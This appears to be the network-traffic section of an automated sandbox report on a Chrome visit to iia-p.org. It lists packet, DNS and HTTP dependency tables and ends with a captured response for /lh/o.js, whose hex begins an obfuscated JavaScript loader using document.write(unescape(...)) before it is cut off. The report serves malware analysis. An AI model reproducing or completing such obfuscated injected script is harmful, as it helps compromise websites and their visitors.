Apr 26, 2024 06:28:11.050533056 CEST	49748	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:11.050564051 CEST	443	49748	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:11.052625895 CEST	443	49747	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:11.052685976 CEST	49747	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:11.054193020 CEST	443	49748	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:11.054258108 CEST	49748	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:11.060118914 CEST	443	49745	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:11.061652899 CEST	49745	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:11.076028109 CEST	49742	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:11.076056004 CEST	443	49742	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:11.109776020 CEST	49748	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:11.110130072 CEST	443	49748	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:11.110754967 CEST	49747	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:11.111087084 CEST	443	49747	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:11.111358881 CEST	49748	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:11.111391068 CEST	443	49748	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:11.111536026 CEST	49747	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:11.111550093 CEST	443	49747	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:11.118299961 CEST	49742	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:11.120419025 CEST	49746	443	192.168.2.4	23.34.16.106
Apr 26, 2024 06:28:11.163826942 CEST	49747	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:11.163841963 CEST	49748	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:11.164129972 CEST	443	49746	23.34.16.106	192.168.2.4
Apr 26, 2024 06:28:11.269160986 CEST	443	49746	23.34.16.106	192.168.2.4
Apr 26, 2024 06:28:11.269325018 CEST	443	49746	23.34.16.106	192.168.2.4
Apr 26, 2024 06:28:11.269350052 CEST	49746	443	192.168.2.4	23.34.16.106
Apr 26, 2024 06:28:11.269387007 CEST	443	49746	23.34.16.106	192.168.2.4
Apr 26, 2024 06:28:11.269402981 CEST	49746	443	192.168.2.4	23.34.16.106
Apr 26, 2024 06:28:11.269402981 CEST	49746	443	192.168.2.4	23.34.16.106
Apr 26, 2024 06:28:11.269413948 CEST	443	49746	23.34.16.106	192.168.2.4
Apr 26, 2024 06:28:11.269423008 CEST	443	49746	23.34.16.106	192.168.2.4
Apr 26, 2024 06:28:11.309185028 CEST	49749	443	192.168.2.4	23.34.16.106
Apr 26, 2024 06:28:11.309216022 CEST	443	49749	23.34.16.106	192.168.2.4
Apr 26, 2024 06:28:11.309273005 CEST	49749	443	192.168.2.4	23.34.16.106
Apr 26, 2024 06:28:11.309513092 CEST	49749	443	192.168.2.4	23.34.16.106
Apr 26, 2024 06:28:11.309525013 CEST	443	49749	23.34.16.106	192.168.2.4
Apr 26, 2024 06:28:11.341312885 CEST	443	49748	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:11.341398001 CEST	443	49748	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:11.341464996 CEST	49748	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:11.341495991 CEST	443	49748	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:11.341527939 CEST	443	49748	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:11.341610909 CEST	49748	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:11.342097044 CEST	49748	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:11.342097044 CEST	49748	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:11.342120886 CEST	443	49748	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:11.342190027 CEST	49748	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:11.547620058 CEST	49750	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:11.547653913 CEST	443	49750	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:11.547787905 CEST	49750	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:11.548006058 CEST	49750	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:11.548017979 CEST	443	49750	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:11.610275030 CEST	443	49749	23.34.16.106	192.168.2.4
Apr 26, 2024 06:28:11.610356092 CEST	49749	443	192.168.2.4	23.34.16.106
Apr 26, 2024 06:28:11.611571074 CEST	49749	443	192.168.2.4	23.34.16.106
Apr 26, 2024 06:28:11.611581087 CEST	443	49749	23.34.16.106	192.168.2.4
Apr 26, 2024 06:28:11.611902952 CEST	443	49749	23.34.16.106	192.168.2.4
Apr 26, 2024 06:28:11.612972975 CEST	49749	443	192.168.2.4	23.34.16.106
Apr 26, 2024 06:28:11.660113096 CEST	443	49749	23.34.16.106	192.168.2.4
Apr 26, 2024 06:28:11.674393892 CEST	443	49747	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:11.674748898 CEST	443	49747	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:11.674809933 CEST	49747	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:11.675448895 CEST	49747	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:11.675467968 CEST	443	49747	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:11.726459980 CEST	443	49745	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:11.726480007 CEST	443	49745	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:11.726486921 CEST	443	49745	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:11.726499081 CEST	443	49745	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:11.726505995 CEST	443	49745	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:11.726511002 CEST	443	49745	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:11.726535082 CEST	49745	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:11.726561069 CEST	443	49745	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:11.726572990 CEST	49745	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:11.726613045 CEST	49745	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:11.726618052 CEST	443	49745	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:11.726634979 CEST	443	49745	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:11.726659060 CEST	49745	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:11.726681948 CEST	49745	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:11.727302074 CEST	49745	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:11.727312088 CEST	443	49745	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:11.787036896 CEST	49751	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:11.787072897 CEST	443	49751	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:11.787137985 CEST	49751	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:11.787513971 CEST	49751	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:11.787535906 CEST	443	49751	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:11.906620026 CEST	443	49749	23.34.16.106	192.168.2.4
Apr 26, 2024 06:28:11.906799078 CEST	443	49749	23.34.16.106	192.168.2.4
Apr 26, 2024 06:28:11.906860113 CEST	49749	443	192.168.2.4	23.34.16.106
Apr 26, 2024 06:28:11.993172884 CEST	443	49750	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:11.996148109 CEST	49750	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:11.996166945 CEST	443	49750	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:11.997625113 CEST	443	49750	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:11.997680902 CEST	49750	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:11.998142958 CEST	49750	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:11.998219967 CEST	443	49750	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:11.998472929 CEST	49750	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:11.998478889 CEST	443	49750	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:12.046991110 CEST	49750	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:12.077647924 CEST	49749	443	192.168.2.4	23.34.16.106
Apr 26, 2024 06:28:12.077670097 CEST	443	49749	23.34.16.106	192.168.2.4
Apr 26, 2024 06:28:12.235045910 CEST	443	49751	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:12.253751040 CEST	49751	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:12.253772020 CEST	443	49751	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:12.254148960 CEST	443	49751	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:12.254544973 CEST	49751	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:12.254611015 CEST	443	49751	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:12.254885912 CEST	49751	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:12.300117970 CEST	443	49751	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:12.309195042 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:12.309279919 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:12.309343100 CEST	49733	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:12.550823927 CEST	443	49750	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:12.601315975 CEST	49750	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:12.681801081 CEST	443	49751	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:12.681824923 CEST	443	49751	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:12.681840897 CEST	443	49751	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:12.681885958 CEST	49751	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:12.681916952 CEST	443	49751	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:12.681946039 CEST	443	49751	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:12.681972980 CEST	49751	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:12.681989908 CEST	49751	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:12.880340099 CEST	49751	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:12.880359888 CEST	443	49751	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:14.700546980 CEST	49733	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:14.700581074 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:14.700611115 CEST	49733	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:14.700638056 CEST	49733	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:16.030915022 CEST	443	49742	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:16.031099081 CEST	443	49742	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:16.031173944 CEST	49742	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:16.993650913 CEST	49742	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:16.993686914 CEST	443	49742	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:16.993710041 CEST	49742	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:16.993740082 CEST	49742	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:17.551891088 CEST	443	49750	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:17.551971912 CEST	443	49750	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:17.552017927 CEST	49750	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:17.853327036 CEST	49750	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:17.853358984 CEST	443	49750	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:18.955543995 CEST	49756	443	192.168.2.4	40.127.169.103
Apr 26, 2024 06:28:18.955586910 CEST	443	49756	40.127.169.103	192.168.2.4
Apr 26, 2024 06:28:18.955673933 CEST	49756	443	192.168.2.4	40.127.169.103
Apr 26, 2024 06:28:18.956666946 CEST	49756	443	192.168.2.4	40.127.169.103
Apr 26, 2024 06:28:18.956712008 CEST	443	49756	40.127.169.103	192.168.2.4
Apr 26, 2024 06:28:19.380784035 CEST	443	49741	142.250.217.164	192.168.2.4
Apr 26, 2024 06:28:19.380940914 CEST	443	49741	142.250.217.164	192.168.2.4
Apr 26, 2024 06:28:19.381009102 CEST	49741	443	192.168.2.4	142.250.217.164
Apr 26, 2024 06:28:19.744812965 CEST	443	49756	40.127.169.103	192.168.2.4
Apr 26, 2024 06:28:19.744894028 CEST	49756	443	192.168.2.4	40.127.169.103
Apr 26, 2024 06:28:19.749202013 CEST	49756	443	192.168.2.4	40.127.169.103
Apr 26, 2024 06:28:19.749222994 CEST	443	49756	40.127.169.103	192.168.2.4
Apr 26, 2024 06:28:19.749630928 CEST	443	49756	40.127.169.103	192.168.2.4
Apr 26, 2024 06:28:19.804034948 CEST	49756	443	192.168.2.4	40.127.169.103
Apr 26, 2024 06:28:19.868540049 CEST	49741	443	192.168.2.4	142.250.217.164
Apr 26, 2024 06:28:19.868601084 CEST	443	49741	142.250.217.164	192.168.2.4
Apr 26, 2024 06:28:20.390938997 CEST	49756	443	192.168.2.4	40.127.169.103
Apr 26, 2024 06:28:20.432120085 CEST	443	49756	40.127.169.103	192.168.2.4
Apr 26, 2024 06:28:20.900672913 CEST	443	49756	40.127.169.103	192.168.2.4
Apr 26, 2024 06:28:20.900729895 CEST	443	49756	40.127.169.103	192.168.2.4
Apr 26, 2024 06:28:20.900749922 CEST	443	49756	40.127.169.103	192.168.2.4
Apr 26, 2024 06:28:20.900789022 CEST	443	49756	40.127.169.103	192.168.2.4
Apr 26, 2024 06:28:20.900789976 CEST	49756	443	192.168.2.4	40.127.169.103
Apr 26, 2024 06:28:20.900808096 CEST	443	49756	40.127.169.103	192.168.2.4
Apr 26, 2024 06:28:20.900810957 CEST	49756	443	192.168.2.4	40.127.169.103
Apr 26, 2024 06:28:20.900825977 CEST	443	49756	40.127.169.103	192.168.2.4
Apr 26, 2024 06:28:20.900830984 CEST	49756	443	192.168.2.4	40.127.169.103
Apr 26, 2024 06:28:20.900855064 CEST	49756	443	192.168.2.4	40.127.169.103
Apr 26, 2024 06:28:20.900871038 CEST	443	49756	40.127.169.103	192.168.2.4
Apr 26, 2024 06:28:20.900871992 CEST	49756	443	192.168.2.4	40.127.169.103
Apr 26, 2024 06:28:20.900918007 CEST	49756	443	192.168.2.4	40.127.169.103
Apr 26, 2024 06:28:20.901097059 CEST	443	49756	40.127.169.103	192.168.2.4
Apr 26, 2024 06:28:20.901150942 CEST	49756	443	192.168.2.4	40.127.169.103
Apr 26, 2024 06:28:20.901161909 CEST	443	49756	40.127.169.103	192.168.2.4
Apr 26, 2024 06:28:20.901290894 CEST	443	49756	40.127.169.103	192.168.2.4
Apr 26, 2024 06:28:20.901818991 CEST	49756	443	192.168.2.4	40.127.169.103
Apr 26, 2024 06:28:21.521939039 CEST	49756	443	192.168.2.4	40.127.169.103
Apr 26, 2024 06:28:21.521970034 CEST	443	49756	40.127.169.103	192.168.2.4
Apr 26, 2024 06:28:26.188054085 CEST	80	49723	162.222.107.40	192.168.2.4
Apr 26, 2024 06:28:26.188234091 CEST	49723	80	192.168.2.4	162.222.107.40
Apr 26, 2024 06:28:26.188282013 CEST	49723	80	192.168.2.4	162.222.107.40
Apr 26, 2024 06:28:26.335269928 CEST	80	49723	162.222.107.40	192.168.2.4
Apr 26, 2024 06:28:40.865147114 CEST	80	49724	208.111.136.128	192.168.2.4
Apr 26, 2024 06:28:40.865252018 CEST	49724	80	192.168.2.4	208.111.136.128
Apr 26, 2024 06:28:40.865338087 CEST	49724	80	192.168.2.4	208.111.136.128
Apr 26, 2024 06:28:41.013551950 CEST	80	49724	208.111.136.128	192.168.2.4
Apr 26, 2024 06:28:57.988425970 CEST	49768	443	192.168.2.4	40.127.169.103
Apr 26, 2024 06:28:57.988517046 CEST	443	49768	40.127.169.103	192.168.2.4
Apr 26, 2024 06:28:57.988663912 CEST	49768	443	192.168.2.4	40.127.169.103
Apr 26, 2024 06:28:57.988959074 CEST	49768	443	192.168.2.4	40.127.169.103
Apr 26, 2024 06:28:57.988993883 CEST	443	49768	40.127.169.103	192.168.2.4
Apr 26, 2024 06:28:58.763953924 CEST	443	49768	40.127.169.103	192.168.2.4
Apr 26, 2024 06:28:58.764117956 CEST	49768	443	192.168.2.4	40.127.169.103
Apr 26, 2024 06:28:58.769151926 CEST	49768	443	192.168.2.4	40.127.169.103
Apr 26, 2024 06:28:58.769176006 CEST	443	49768	40.127.169.103	192.168.2.4
Apr 26, 2024 06:28:58.769660950 CEST	443	49768	40.127.169.103	192.168.2.4
Apr 26, 2024 06:28:58.779491901 CEST	49768	443	192.168.2.4	40.127.169.103
Apr 26, 2024 06:28:58.820122957 CEST	443	49768	40.127.169.103	192.168.2.4
Apr 26, 2024 06:28:59.526202917 CEST	443	49768	40.127.169.103	192.168.2.4
Apr 26, 2024 06:28:59.526233912 CEST	443	49768	40.127.169.103	192.168.2.4
Apr 26, 2024 06:28:59.526333094 CEST	49768	443	192.168.2.4	40.127.169.103
Apr 26, 2024 06:28:59.526398897 CEST	443	49768	40.127.169.103	192.168.2.4
Apr 26, 2024 06:28:59.526489019 CEST	49768	443	192.168.2.4	40.127.169.103
Apr 26, 2024 06:28:59.526663065 CEST	443	49768	40.127.169.103	192.168.2.4
Apr 26, 2024 06:28:59.526701927 CEST	443	49768	40.127.169.103	192.168.2.4
Apr 26, 2024 06:28:59.526738882 CEST	49768	443	192.168.2.4	40.127.169.103
Apr 26, 2024 06:28:59.526757002 CEST	443	49768	40.127.169.103	192.168.2.4
Apr 26, 2024 06:28:59.526777029 CEST	443	49768	40.127.169.103	192.168.2.4
Apr 26, 2024 06:28:59.526810884 CEST	49768	443	192.168.2.4	40.127.169.103
Apr 26, 2024 06:28:59.526839972 CEST	49768	443	192.168.2.4	40.127.169.103
Apr 26, 2024 06:28:59.533523083 CEST	49768	443	192.168.2.4	40.127.169.103
Apr 26, 2024 06:28:59.533572912 CEST	443	49768	40.127.169.103	192.168.2.4
Apr 26, 2024 06:28:59.533602953 CEST	49768	443	192.168.2.4	40.127.169.103
Apr 26, 2024 06:28:59.533618927 CEST	443	49768	40.127.169.103	192.168.2.4
Apr 26, 2024 06:29:08.860757113 CEST	49770	443	192.168.2.4	142.250.217.164
Apr 26, 2024 06:29:08.860805988 CEST	443	49770	142.250.217.164	192.168.2.4
Apr 26, 2024 06:29:08.860929966 CEST	49770	443	192.168.2.4	142.250.217.164
Apr 26, 2024 06:29:08.862350941 CEST	49770	443	192.168.2.4	142.250.217.164
Apr 26, 2024 06:29:08.862363100 CEST	443	49770	142.250.217.164	192.168.2.4
Apr 26, 2024 06:29:09.310942888 CEST	443	49770	142.250.217.164	192.168.2.4
Apr 26, 2024 06:29:09.311456919 CEST	49770	443	192.168.2.4	142.250.217.164
Apr 26, 2024 06:29:09.311469078 CEST	443	49770	142.250.217.164	192.168.2.4
Apr 26, 2024 06:29:09.312688112 CEST	443	49770	142.250.217.164	192.168.2.4
Apr 26, 2024 06:29:09.313142061 CEST	49770	443	192.168.2.4	142.250.217.164
Apr 26, 2024 06:29:09.313313007 CEST	443	49770	142.250.217.164	192.168.2.4
Apr 26, 2024 06:29:09.366312981 CEST	49770	443	192.168.2.4	142.250.217.164
Apr 26, 2024 06:29:19.297224998 CEST	443	49770	142.250.217.164	192.168.2.4
Apr 26, 2024 06:29:19.297307968 CEST	443	49770	142.250.217.164	192.168.2.4
Apr 26, 2024 06:29:19.297369003 CEST	49770	443	192.168.2.4	142.250.217.164
Apr 26, 2024 06:29:19.890213966 CEST	49770	443	192.168.2.4	142.250.217.164
Apr 26, 2024 06:29:19.890235901 CEST	443	49770	142.250.217.164	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 26, 2024 06:28:05.702236891 CEST	49215	53	192.168.2.4	1.1.1.1
Apr 26, 2024 06:28:05.702238083 CEST	50704	53	192.168.2.4	1.1.1.1
Apr 26, 2024 06:28:05.831408978 CEST	53	63668	1.1.1.1	192.168.2.4
Apr 26, 2024 06:28:05.849617958 CEST	53	52082	1.1.1.1	192.168.2.4
Apr 26, 2024 06:28:05.920826912 CEST	53	50704	1.1.1.1	192.168.2.4
Apr 26, 2024 06:28:05.993964911 CEST	53	49215	1.1.1.1	192.168.2.4
Apr 26, 2024 06:28:06.960975885 CEST	53	54391	1.1.1.1	192.168.2.4
Apr 26, 2024 06:28:07.533833027 CEST	54042	53	192.168.2.4	1.1.1.1
Apr 26, 2024 06:28:07.533952951 CEST	62728	53	192.168.2.4	1.1.1.1
Apr 26, 2024 06:28:07.679883003 CEST	53	56394	1.1.1.1	192.168.2.4
Apr 26, 2024 06:28:08.828058004 CEST	57301	53	192.168.2.4	1.1.1.1
Apr 26, 2024 06:28:08.862070084 CEST	55524	53	192.168.2.4	1.1.1.1
Apr 26, 2024 06:28:08.982939959 CEST	53	57301	1.1.1.1	192.168.2.4
Apr 26, 2024 06:28:09.009121895 CEST	53	55524	1.1.1.1	192.168.2.4
Apr 26, 2024 06:28:11.149976969 CEST	55345	53	192.168.2.4	1.1.1.1
Apr 26, 2024 06:28:11.150496960 CEST	52422	53	192.168.2.4	1.1.1.1
Apr 26, 2024 06:28:11.525706053 CEST	53	55345	1.1.1.1	192.168.2.4
Apr 26, 2024 06:28:11.547096968 CEST	53	52422	1.1.1.1	192.168.2.4
Apr 26, 2024 06:28:18.051364899 CEST	53	53877	1.1.1.1	192.168.2.4
Apr 26, 2024 06:28:24.546422958 CEST	53	61695	1.1.1.1	192.168.2.4
Apr 26, 2024 06:28:27.174348116 CEST	138	138	192.168.2.4	192.168.2.255
Apr 26, 2024 06:28:43.636399984 CEST	53	55911	1.1.1.1	192.168.2.4
Apr 26, 2024 06:29:05.360573053 CEST	53	54199	1.1.1.1	192.168.2.4
Apr 26, 2024 06:29:06.468096972 CEST	53	50868	1.1.1.1	192.168.2.4
Apr 26, 2024 06:29:34.260165930 CEST	53	51687	1.1.1.1	192.168.2.4
Apr 26, 2024 06:30:20.748959064 CEST	53	55676	1.1.1.1	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Apr 26, 2024 06:28:05.994080067 CEST	192.168.2.4	1.1.1.1	c21b	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 26, 2024 06:28:05.702236891 CEST	192.168.2.4	1.1.1.1	0xf7f0	Standard query (0)	iia-p.org	65	IN (0x0001)	false
Apr 26, 2024 06:28:05.702238083 CEST	192.168.2.4	1.1.1.1	0x450f	Standard query (0)	iia-p.org	A (IP address)	IN (0x0001)	false
Apr 26, 2024 06:28:07.533833027 CEST	192.168.2.4	1.1.1.1	0xb41	Standard query (0)	use.fontawesome.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 06:28:07.533952951 CEST	192.168.2.4	1.1.1.1	0x2d0f	Standard query (0)	use.fontawesome.com	65	IN (0x0001)	false
Apr 26, 2024 06:28:08.828058004 CEST	192.168.2.4	1.1.1.1	0x2b1f	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 06:28:08.862070084 CEST	192.168.2.4	1.1.1.1	0x3556	Standard query (0)	www.google.com	65	IN (0x0001)	false
Apr 26, 2024 06:28:11.149976969 CEST	192.168.2.4	1.1.1.1	0xaccf	Standard query (0)	iia-p.org	A (IP address)	IN (0x0001)	false
Apr 26, 2024 06:28:11.150496960 CEST	192.168.2.4	1.1.1.1	0x54e0	Standard query (0)	iia-p.org	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 26, 2024 06:28:05.920826912 CEST	1.1.1.1	192.168.2.4	0x450f	No error (0)	iia-p.org		192.232.216.145	A (IP address)	IN (0x0001)	false
Apr 26, 2024 06:28:07.680696011 CEST	1.1.1.1	192.168.2.4	0xb41	No error (0)	use.fontawesome.com	use.fontawesome.com.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 06:28:07.682102919 CEST	1.1.1.1	192.168.2.4	0x2d0f	No error (0)	use.fontawesome.com	use.fontawesome.com.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 06:28:08.982939959 CEST	1.1.1.1	192.168.2.4	0x2b1f	No error (0)	www.google.com		142.250.217.164	A (IP address)	IN (0x0001)	false
Apr 26, 2024 06:28:09.009121895 CEST	1.1.1.1	192.168.2.4	0x3556	No error (0)	www.google.com			65	IN (0x0001)	false
Apr 26, 2024 06:28:09.259723902 CEST	1.1.1.1	192.168.2.4	0x8a29	No error (0)	shed.dual-low.part-0013.t-0009.t-msedge.net	part-0013.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 06:28:09.259723902 CEST	1.1.1.1	192.168.2.4	0x8a29	No error (0)	part-0013.t-0009.t-msedge.net		13.107.213.41	A (IP address)	IN (0x0001)	false
Apr 26, 2024 06:28:09.259723902 CEST	1.1.1.1	192.168.2.4	0x8a29	No error (0)	part-0013.t-0009.t-msedge.net		13.107.246.41	A (IP address)	IN (0x0001)	false
Apr 26, 2024 06:28:10.589596033 CEST	1.1.1.1	192.168.2.4	0x8af7	No error (0)	shed.dual-low.part-0013.t-0009.t-msedge.net	part-0013.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 06:28:10.589596033 CEST	1.1.1.1	192.168.2.4	0x8af7	No error (0)	part-0013.t-0009.t-msedge.net		13.107.213.41	A (IP address)	IN (0x0001)	false
Apr 26, 2024 06:28:10.589596033 CEST	1.1.1.1	192.168.2.4	0x8af7	No error (0)	part-0013.t-0009.t-msedge.net		13.107.246.41	A (IP address)	IN (0x0001)	false
Apr 26, 2024 06:28:11.525706053 CEST	1.1.1.1	192.168.2.4	0xaccf	No error (0)	iia-p.org		192.232.216.145	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

iia-p.org

logincdn.msauth.net

fs.microsoft.com

slscr.update.microsoft.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	192.232.216.145	443	5352	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 04:28:06 UTC	568	OUT	GET /lh/o.js HTTP/1.1 Host: iia-p.org Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning" sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-26 04:28:06 UTC	359	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 04:28:06 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade Last-Modified: Tue, 09 Apr 2024 12:07:43 GMT Accept-Ranges: bytes Content-Length: 114178 Cache-Control: max-age=31536000, public Expires: Sat, 26 Apr 2025 04:28:06 GMT Vary: Accept-Encoding Content-Type: application/javascript; charset=utf-8
2024-04-26 04:28:06 UTC	7833	IN	Data Raw: 76 61 72 20 5f 30 78 36 62 32 39 3d 5b 22 5c 78 32 35 5c 78 33 33 5c 78 34 33 5c 78 37 33 5c 78 36 33 5c 78 37 32 5c 78 36 39 5c 78 37 30 5c 78 37 34 5c 78 32 35 5c 78 33 32 5c 78 33 30 5c 78 36 63 5c 78 36 31 5c 78 36 65 5c 78 36 37 5c 78 37 35 5c 78 36 31 5c 78 36 37 5c 78 36 35 5c 78 32 35 5c 78 33 33 5c 78 34 34 5c 78 36 61 5c 78 36 31 5c 78 37 36 5c 78 36 31 5c 78 37 33 5c 78 36 33 5c 78 37 32 5c 78 36 39 5c 78 37 30 5c 78 37 34 5c 78 32 35 5c 78 33 33 5c 78 34 35 5c 78 36 34 5c 78 36 66 5c 78 36 33 5c 78 37 35 5c 78 36 64 5c 78 36 35 5c 78 36 65 5c 78 37 34 5c 78 32 65 5c 78 37 37 5c 78 37 32 5c 78 36 39 5c 78 37 34 5c 78 36 35 5c 78 32 38 5c 78 37 35 5c 78 36 65 5c 78 36 35 5c 78 37 33 5c 78 36 33 5c 78 36 31 5c 78 37 30 5c 78 36 35 5c 78 32 38 5c Data Ascii: var 